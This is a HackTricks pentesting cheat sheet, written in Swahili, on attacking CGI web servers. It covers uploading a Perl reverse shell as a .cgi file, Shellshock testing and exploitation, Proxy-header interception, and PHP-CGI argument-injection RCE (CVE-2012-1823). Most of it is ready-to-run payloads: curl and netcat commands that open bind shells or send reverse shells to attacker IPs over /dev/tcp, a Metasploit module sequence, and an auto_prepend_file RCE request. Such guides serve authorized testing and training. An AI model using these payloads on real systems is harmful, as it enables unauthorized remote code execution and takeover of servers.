{{#include ../../banners/hacktricks-training.md}} # Taarifa **CGI scripts ni scripts za perl**, hivyo, ikiwa umepata udhibiti wa seva inayoweza kutekeleza _**.cgi**_ scripts unaweza **kupakia shell ya perl reverse** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), **badilisha kiambishi** kutoka **.pl** hadi **.cgi**, toa **idhini za kutekeleza** \(`chmod +x`\) na **fikia** shell ya reverse **kutoka kwa kivinjari cha wavuti** ili kuitekeleza. Ili kujaribu **CGI vulns** inashauriwa kutumia `nikto -C all` \(na plugins zote\) # **ShellShock** **ShellShock** ni **udhaifu** unaoathiri **Bash** shell ya amri inayotumika sana katika mifumo ya uendeshaji ya Unix. Inalenga uwezo wa Bash wa kutekeleza amri zinazopitishwa na programu. Udhaifu huu uko katika udanganyifu wa **mabadiliko ya mazingira**, ambayo ni thamani zenye majina zinazobadilika ambazo zinaathiri jinsi michakato inavyofanya kazi kwenye kompyuta. Washambuliaji wanaweza kutumia hii kwa kuambatanisha **kodhi mbaya** kwenye mabadiliko ya mazingira, ambayo inatekelezwa wanapopokea mabadiliko hayo. Hii inawawezesha washambuliaji kuweza kuathiri mfumo. Kutatua udhaifu huu **ukurasa unaweza kutoa kosa**. Unaweza **kupata** udhaifu huu kwa kugundua kwamba inatumia **toleo la zamani la Apache** na **cgi_mod** \(ikiwa na folda ya cgi\) au kutumia **nikto**. ## **Jaribio** Majaribio mengi yanategemea kutuma kitu na kutarajia kwamba hiyo mistari inarudishwa katika jibu la wavuti. Ikiwa unafikiri ukurasa unaweza kuwa na udhaifu, tafuta kurasa zote za cgi na uzijaribu. **Nmap** ```bash nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi ``` ## **Curl \(reflected, blind and out-of-band\)** ```bash # Reflected curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE' # Blind with sleep (you could also make a ping or web request to yourself and monitor that oth tcpdump) curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi # Out-Of-Band Use Cookie as alternative to User-Agent curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh ``` [**Shellsocker**](https://github.com/liamim/shellshocker) ```bash python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi ``` ## Kutilia ```bash #Bind Shell $ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 8 #Reverse shell $ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.159.1 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80 #Reverse shell using curl curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' http://10.1.2.11/cgi-bin/admin.cgi #Reverse shell using metasploit > use multi/http/apache_mod_cgi_bash_env_exec > set targeturi /cgi-bin/admin.cgi > set rhosts 10.1.2.11 > run ``` # **Proxy \(MitM kwa Maombi ya Web server\)** CGI inaunda variable ya mazingira kwa kila kichwa katika ombi la http. Kwa mfano: "host:web.com" inaundwa kama "HTTP_HOST"="web.com" Kama variable ya HTTP_PROXY inaweza kutumika na web server. Jaribu kutuma **kichwa** chenye: "**Proxy: <IP_attacker>:<PORT>**" na ikiwa server itafanya ombi lolote wakati wa kikao. Utaweza kukamata kila ombi lililofanywa na server. # Old PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\) Kimsingi ikiwa cgi inafanya kazi na php ni "ya zamani" \(<5.3.12 / < 5.4.2\) unaweza kutekeleza msimbo. Ili kutumia udhaifu huu unahitaji kufikia faili fulani la PHP la web server bila kutuma vigezo \(hasa bila kutuma herufi "="\). Kisha, ili kujaribu udhaifu huu, unaweza kufikia kwa mfano `/index.php?-s` \(zingatia `-s`\) na **msimbo wa chanzo wa programu utaonekana katika jibu**. Kisha, ili kupata **RCE** unaweza kutuma uchunguzi huu maalum: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` na **msimbo wa PHP** utakaotekelezwa katika **mwili wa ombi. Mfano:** ```bash curl -i --data-binary "" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" ``` **Maelezo zaidi kuhusu vuln na uwezekano wa exploits:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Andiko Mfano**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.** {{#include ../../banners/hacktricks-training.md}}